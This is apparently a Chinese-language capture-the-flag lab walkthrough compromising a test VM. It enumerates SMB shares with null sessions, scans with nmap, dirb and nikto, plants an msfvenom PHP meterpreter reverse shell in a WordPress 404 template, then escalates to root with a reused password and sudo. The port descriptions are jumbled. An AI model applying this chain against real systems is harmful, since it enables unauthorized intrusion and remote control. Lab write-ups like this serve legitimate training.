SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。
Port 139 (TCP) - 文件和打印共享 ; smbd (基于SMB(Server Message Port 445 (TCP) - NetBIOS服务在windos 2000及以后版本使用此端口, (Common Internet File System,CIFS,它是SMB协议扩展到Internet后,实现Internet文件共享)Block)协议,主要在局域网中使用,文件共享协议)
139和445都是smb协议
3306开发mysql服务
1针对smb协议,使用空口令
smbclient -L ip
smbclient '\\ip\$share'
ipc是空文件,print无权限访问
get 敏感文件
- gedit是一个Linux环境下的文本编辑器,类似windows下的写字板程序,在不需要特别复杂的编程环境下,作为基本的文本编辑器比较合适。
3306端口开放mysql服务
不允许远程登陆mysql
那就通过ssh协议进入主机再登陆
2针对smb协议远程溢出漏洞进行分析
searchsploit samba版本号
nmap -A -v -T4 192.168.1.108
搜出samba版本号
针对http协议弱点分析
浏览器查看网站,使用dirb,nikto探测,寻找突破点,目标登陆后台,上传webshell
dirb http://192.168.1.108
==> DIRECTORY: http://192.168.1.108/wordpress/wp-admin/
登陆到后台
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机Ip Iport=4444 -f raw >/root/Destktop/shell.php
利用msfvenom制作 .exe 文件,然后发送到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机
msfconsole
输入run之后去打开web网页点击Appearance》》Editor》》404 Template
把shell.php文件里的代码复制到404里去点击上传成功后会显示出来
然后通过固定路径http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php访问webshell
然后输入id反弹回shell
接下来还是同样的,优化终端(python -c “import pty;pty.spawn(’/bin/bash’)”)
使用cat /etc/passwd/查看当前系统的其他用户名(注意home目录下)发现个togie用户,su togie去切换到togie目录,密码用之前发现的12345登录成功。
还是要去切换到root权限,用sudo -l查看su能执行哪些操作,然后用sudo su来提升权限
最后在root找到proof.txt。